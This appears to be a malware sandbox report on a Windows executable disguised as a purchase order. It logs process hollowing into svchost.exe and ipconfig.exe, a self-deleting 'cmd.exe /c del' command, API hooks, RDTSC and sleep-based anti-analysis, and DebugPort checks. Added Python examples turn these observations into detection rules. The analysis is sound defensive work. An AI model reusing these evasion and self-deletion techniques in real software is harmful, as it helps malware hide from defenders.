          Source: C:\Windows\explorer.exe; Process created: C:\Windows\SysWOW64\autochk.exe "C:\Windows\SysWOW64\autochk.exe"
          Source: C:\Windows\SysWOW64\svchost.exe; Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
          Source: C:\Windows\SysWOW64\ipconfig.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Section loaded: apphelp.dll
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Section loaded: wsock32.dll
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Section loaded: version.dll
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Section loaded: winmm.dll
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Section loaded: mpr.dll
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Section loaded: kernel.appcore.dll
          Source: C:\Windows\explorer.exe; Section loaded: windows.cloudstore.schema.shell.dll
          Source: C:\Windows\SysWOW64\ipconfig.exe; Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\ipconfig.exe; Section loaded: dhcpcsvc.dll
          Source: C:\Windows\SysWOW64\ipconfig.exe; Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\SysWOW64\ipconfig.exe; Section loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\ipconfig.exe; Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Windows\explorer.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office
          Source: Purchase order MIPO2425110032.exe; Static file information: File size 1312891 > 1048576
          Source: Binary string: ipconfig.pdb source: svchost.exe, 00000002.00000003.2190510820.000000000322C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2190826330.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2190955342.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000005.00000002.3285457081.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: svchost.exe, 00000002.00000003.2190510820.000000000322C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2190826330.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2190955342.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3285457081.0000000000CB0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: Purchase order MIPO2425110032.exe, 00000000.00000003.2045249751.0000000004540000.00000004.00001000.00020000.00000000.sdmp, Purchase order MIPO2425110032.exe, 00000000.00000003.2045727353.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2191013249.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046797348.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2049073833.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2191013249.000000000399E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3286755953.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3286755953.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000003.2192710739.000000000370F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000003.2191001100.0000000003534000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Purchase order MIPO2425110032.exe, 00000000.00000003.2045249751.0000000004540000.00000004.00001000.00020000.00000000.sdmp, Purchase order MIPO2425110032.exe, 00000000.00000003.2045727353.00000000046E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2191013249.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2046797348.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2049073833.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2191013249.000000000399E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000005.00000002.3286755953.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3286755953.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000003.2192710739.000000000370F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000005.00000003.2191001100.0000000003534000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.3299252701.0000000010B0F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3287464793.0000000003E0F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3285883515.0000000003382000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.3299252701.0000000010B0F000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3287464793.0000000003E0F000.00000004.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000005.00000002.3285883515.0000000003382000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
          Source: Purchase order MIPO2425110032.exe; Static PE information: real checksum: 0xa961f should be: 0x14cb0b
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe; Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0041285C push cs; retf 2_2_0041285F
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_00417008 pushfd ; retf 2_2_0041700F
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_004171EF push ds; iretd 2_2_004171FD
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0041E992 push dword ptr [08CCB4BEh]; ret 2_2_0041E9AA
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0041E9B2 push dword ptr [0ECCDC24h]; ret 2_2_0041EACE
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_00416A81 pushfd ; retf 2_2_00416A82
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_00417ABC push edi; ret 2_2_00417ABD
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0040E46D push ebx; retf 2_2_0040E470
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0041D475 push eax; ret 2_2_0041D4C8
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0041D4C2 push eax; ret 2_2_0041D4C8
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0041D4CB push eax; ret 2_2_0041D532
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0041D52C push eax; ret 2_2_0041D532
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0041E530 push edi; ret 2_2_0041E532
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_004177BF push B417C20Bh; ret 2_2_004177C4
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_038309AD push ecx; mov dword ptr [esp], ecx 2_2_038309B6
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03DBEB1E push esp; retn 0000h 2_2_03DBEB1F
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03DBEB02 push esp; retn 0000h 2_2_03DBEB03
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_03DBE9B5 push esp; retn 0000h 2_2_03DBEAE7
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0568E9B5 push esp; retn 0000h 2_2_0568EAE7
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0568EB02 push esp; retn 0000h 2_2_0568EB03
          Source: C:\Windows\SysWOW64\svchost.exe; Code function: 2_2_0568EB1E push esp; retn 0000h 2_2_0568EB1F
          Source: C:\Windows\explorer.exe; Code function: 3_2_0F15FB1E push esp; retn 0000h 3_2_0F15FB1F
          Source: C:\Windows\explorer.exe; Code function: 3_2_0F15FB02 push esp; retn 0000h 3_2_0F15FB03
          Source: C:\Windows\explorer.exe; Code function: 3_2_0F15F9B5 push esp; retn 0000h 3_2_0F15FAE7
          Source: C:\Windows\explorer.exe; Code function: 3_2_1038AB1E push esp; retn 0000h 3_2_1038AB1F
          Source: C:\Windows\explorer.exe; Code function: 3_2_1038AB02 push esp; retn 0000h 3_2_1038AB03
          Source: C:\Windows\explorer.exe; Code function: 3_2_1038A9B5 push esp; retn 0000h 3_2_1038AAE7
          Source: C:\Windows\explorer.exe; Code function: 3_2_1086C9B5 push esp; retn 0000h 3_2_1086CAE7
          Source: C:\Windows\explorer.exe; Code function: 3_2_1086CB02 push esp; retn 0000h 3_2_1086CB03
          Source: C:\Windows\explorer.exe; Code function: 3_2_1086CB1E push esp; retn 0000h 3_2_1086CB1F

          Persistence and Installation Behavior

          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
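The single entry in this section is the launch that the later evasion entries attach to: a 32-bit svchost.exe running from SysWOW64 (not hosted by services.exe) starts ipconfig.exe with a bare command line, the image path and nothing else, which is the host the sleeps, RDTSC checks and DNS-cache reads below are attributed to. The following is an added Python example, not code from Joe Sandbox or from this report, that turns those two properties into a process-creation rule. The EVENTS records are constructed from the image names on this page using Sysmon event ID 1 field names; the parent of svchost.exe in the constructed chain, and the hollow-host names other than ipconfig.exe, are assumptions, and the benign rows are there to show the rules stay quiet for normal service hosting and for an operator running ipconfig from a shell.

```python
"""Process-chain rule for the svchost.exe -> ipconfig.exe launch in this report.

Added example; not Joe Sandbox code and not part of the report.  EVENTS are
hand-written from the image names on this page (Sysmon event ID 1 field names,
invented records).  The parent of the SysWOW64 svchost.exe is an assumption.
"""
import ntpath

LEGIT_SVCHOST = r"c:\windows\system32\svchost.exe"
LEGIT_SVCHOST_PARENT = "services.exe"
# Console network tools a loader may hollow instead of dropping a payload.
# Only ipconfig.exe is evidenced on this page; the other two names are assumptions.
HOLLOW_HOSTS = {"ipconfig.exe", "netstat.exe", "nslookup.exe"}
# Parents from which a bare "ipconfig.exe" launch is ordinary operator activity.
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

EVENTS = [  # constructed, not captured telemetry
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Users\user\Desktop\Purchase order MIPO2425110032.exe",
     "CommandLine": r'"C:\Users\user\Desktop\Purchase order MIPO2425110032.exe"'},
    {"ParentImage": r"C:\Users\user\Desktop\Purchase order MIPO2425110032.exe",
     "Image": r"C:\Windows\SysWOW64\svchost.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\svchost.exe"'},
    {"ParentImage": r"C:\Windows\SysWOW64\svchost.exe",           # as on this page
     "Image": r"C:\Windows\SysWOW64\ipconfig.exe",
     "CommandLine": r'"C:\Windows\SysWOW64\ipconfig.exe"'},
    {"ParentImage": r"C:\Windows\System32\services.exe",          # benign service host
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",               # benign operator use
     "Image": r"C:\Windows\System32\ipconfig.exe",
     "CommandLine": "ipconfig /all"},
]


def base(path):
    return ntpath.basename(path).lower()


def split_cmdline(cmdline):
    """Return (program token, remaining arguments) for a Windows command line.
    Only the leading quoted-or-unquoted token matters for this rule."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end != -1:
            return s[1:end], s[end + 1:].strip()
    head, _, tail = s.partition(" ")
    return head, tail.strip()


def is_bare_launch(event):
    """True when the command line is just the image itself (no arguments)."""
    prog, args = split_cmdline(event["CommandLine"])
    p, i = base(prog), base(event["Image"])
    return args == "" and (p == i or p + ".exe" == i)


def classify(event):
    image, parent = base(event["Image"]), base(event["ParentImage"])
    if image == "svchost.exe":
        # Real service hosts live in System32 and are started by services.exe.
        if event["Image"].lower() != LEGIT_SVCHOST or parent != LEGIT_SVCHOST_PARENT:
            return "svchost_unexpected"
    elif image in HOLLOW_HOSTS and is_bare_launch(event) and parent not in SHELLS:
        return "bare_utility_from_non_shell"
    return None


def analyze(events):
    """List (image, rule) for every event a rule fires on, in input order."""
    findings = []
    for e in events:
        rule = classify(e)
        if rule:
            findings.append((e["Image"], rule))
    return findings
```

The bare-command-line test is the useful half: ipconfig.exe run for its own sake almost always carries an argument, and a loader that only needs a legitimately signed 32-bit host has no reason to pass one.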

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE0
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_0047A330
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
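The entries in this section and the next are one evidence line per observation, with the process path and the evidence kind run together and, on the live report, the "Jump to behavior" link text coming along when the lines are copied. The following is an added Python example, not Joe Sandbox code and not part of the report, that parses lines in that layout into a per-process evasion profile: sleep loops per thread, RDTSC check sites, functions that read the PEB through fs:[30h], DebugPort queries, user-mode inline hooks, virtualization-vendor strings and API coverage. REPORT_LINES is a subset of this page's lines as they paste from the report. Two of the computed values are worth a look: dividing each thread's sleep time by its sleep count gives 2000 for every pair on this page, consistent with a two-second delay loop if the figures are milliseconds (the report prints an "s" suffix, so the unit is an assumption); and the successive counts for one thread (2834, then 7115 for TID 5744) read as cumulative snapshots, so the helper reports the maximum per thread rather than a sum. The VM markers other than VMware and Hyper-V are assumptions.

```python
"""Summarise Joe Sandbox evidence lines into a per-process evasion profile.

Added example for this page; not Joe Sandbox code, not part of the report.
REPORT_LINES are this page's lines as they paste from the live report (process
path and evidence kind run together, trailing "Jump to behavior" link text).
"""
import ntpath
import re
from collections import defaultdict

REPORT_LINES = r"""
Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8D 0xDE 0xE0
Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 2.5 %
Source: C:\Windows\explorer.exe TID: 5744Thread sleep count: 2834 > 30Jump to behavior
Source: C:\Windows\explorer.exe TID: 5744Thread sleep time: -5668000s >= -30000sJump to behavior
Source: C:\Windows\explorer.exe TID: 5744Thread sleep count: 7115 > 30Jump to behavior
Source: C:\Windows\explorer.exe TID: 5744Thread sleep time: -14230000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3808Thread sleep count: 135 > 30Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3808Thread sleep time: -270000s >= -30000sJump to behavior
Source: explorer.exe, 00000003.00000002.3287820322.000000000354E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]2_2_0385438F
""".strip().splitlines()

KINDS = ["Code function", "Process created", "Process queried", "Process information set",
         "RDTSC instruction interceptor", "API/Special instruction interceptor",
         "Window / User API", "Binary or memory string", "User mode code has changed",
         "API coverage", "Evasive API call chain", "Last function"]
# The process path is whatever precedes a known evidence kind (no separator on the page).
LINE_RE = re.compile(r"^Source:\s*(?P<src>.+?)\s*(?:TID:\s*(?P<tid>\d+)|(?P<kind>"
                     + "|".join(map(re.escape, KINDS)) + r"))\s*:?\s*(?P<rest>.*)$")
SLEEP_COUNT_RE = re.compile(r"Thread sleep count:\s*(\d+)")
SLEEP_TIME_RE = re.compile(r"Thread sleep time:\s*-?(\d+)s")
RDTSC_RE = re.compile(r"First address:\s*([0-9A-Fa-f]+)")
HOOK_RE = re.compile(r"module:\s*(\S+)\s+function:\s*(\S+)\s+new code:\s*(.*)")
PEB_RE = re.compile(r"fs:\[0*30h\]", re.I)  # TEB->PEB read in 32-bit code
VM_RE = re.compile(r"vmware|hyper-v|virtualbox|vbox|qemu", re.I)  # only VMware/Hyper-V are on this page
RESIDUE = "Jump to behavior"


def new_entry():
    return {"sleeps": [], "rdtsc_sites": set(), "peb_read_funcs": set(),
            "debugport_queries": 0, "hooks": [], "vm_strings": 0,
            "api_coverage": None, "children": []}


def process_key(src):
    # "C:\Windows\explorer.exe" and "explorer.exe, <dump id>.sdmp" are the same process
    return ntpath.basename(src.split(",")[0].strip()).lower()


def summarize(lines):
    summary = defaultdict(new_entry)
    pending = {}  # (process, tid) -> sleep count waiting for its sleep-time line
    for raw in lines:
        line = raw.strip()
        if line.endswith(RESIDUE):
            line = line[:-len(RESIDUE)].rstrip()
        m = LINE_RE.match(line)
        if not m:
            continue
        proc, tid, kind = process_key(m["src"]), m["tid"], m["kind"]
        rest, entry = m["rest"].strip(), summary[proc]
        if tid is not None:
            c, t = SLEEP_COUNT_RE.search(rest), SLEEP_TIME_RE.search(rest)
            if c:
                pending[(proc, tid)] = int(c[1])
            elif t and (proc, tid) in pending:
                entry["sleeps"].append((int(tid), pending.pop((proc, tid)), int(t[1])))
        elif kind == "Code function":
            fid, _, instr = rest.partition(" ")
            if instr.endswith(fid):  # the report repeats the function id at the end
                instr = instr[:-len(fid)]
            if PEB_RE.search(instr):
                entry["peb_read_funcs"].add(fid)
        elif kind == "RDTSC instruction interceptor":
            r = RDTSC_RE.search(rest)
            if r:
                entry["rdtsc_sites"].add(r[1].upper())
        elif kind == "Process queried" and rest.startswith("DebugPort"):
            entry["debugport_queries"] += 1
        elif kind == "User mode code has changed":
            h = HOOK_RE.search(rest)
            if h:
                entry["hooks"].append((h[1], h[2], h[3].strip()))
        elif kind == "Binary or memory string" and VM_RE.search(rest):
            entry["vm_strings"] += 1
        elif kind == "API coverage":
            entry["api_coverage"] = float(rest.rstrip("% "))
        elif kind == "Process created":
            entry["children"].append(rest)
    return dict(summary)


def sleep_interval(entry):
    """Report units per Sleep() call (time / count) for each (tid, snapshot)."""
    return [round(total / count, 1) for _tid, count, total in entry["sleeps"] if count]


def longest_delay(entry):
    """Largest sleep total per thread; successive counts for one TID are cumulative
    snapshots on this page, so summing them would double-count."""
    best = {}
    for tid, _count, total in entry["sleeps"]:
        best[tid] = max(best.get(tid, 0), total)
    return max(best.values(), default=0)


SUMMARY = summarize(REPORT_LINES)
```

Feed it every "Source:" line of the report rather than the subset above; kinds that are matched but not summarised (the NOOPENFILEERRORBOX settings, the Window / User API counters) are silently skipped, so extending the rule set is a matter of adding a branch. Keying the summary on the image basename is what lets the memory-dump lines (explorer.exe, <dump>.sdmp) land in the same bucket as the behaviour lines for C:\Windows\explorer.exe.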

          Malware Analysis System Evasion

          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 5_2_00CB3872 DnsGetCacheDataTableEx,DnsFree,DnsFree,5_2_00CB3872
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeAPI/Special instruction interceptor: Address: 3FA328C
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF8C88F0774
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF8C88ED8A4
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 2FB9904 second address: 2FB990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 2FB9B6E second address: 2FB9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Windows\explorer.exe Window / User API: threadDelayed 2834
          Source: C:\Windows\explorer.exe Window / User API: threadDelayed 7115
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 875
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 872
          Source: C:\Windows\SysWOW64\ipconfig.exe Window / User API: threadDelayed 9836
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-87553
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeAPI coverage: 3.5 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 2.5 %
          Source: C:\Windows\SysWOW64\ipconfig.exeAPI coverage: 1.9 %
          Source: C:\Windows\explorer.exe TID: 5744 Thread sleep count: 2834 > 30
          Source: C:\Windows\explorer.exe TID: 5744 Thread sleep time: -5668000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5744 Thread sleep count: 7115 > 30
          Source: C:\Windows\explorer.exe TID: 5744 Thread sleep time: -14230000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3808 Thread sleep count: 135 > 30
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3808 Thread sleep time: -270000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3808 Thread sleep count: 9836 > 30
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3808 Thread sleep time: -19672000s >= -30000s
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
          Source: C:\Users\user\Desktop\Purchase order MIPO2425110032.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
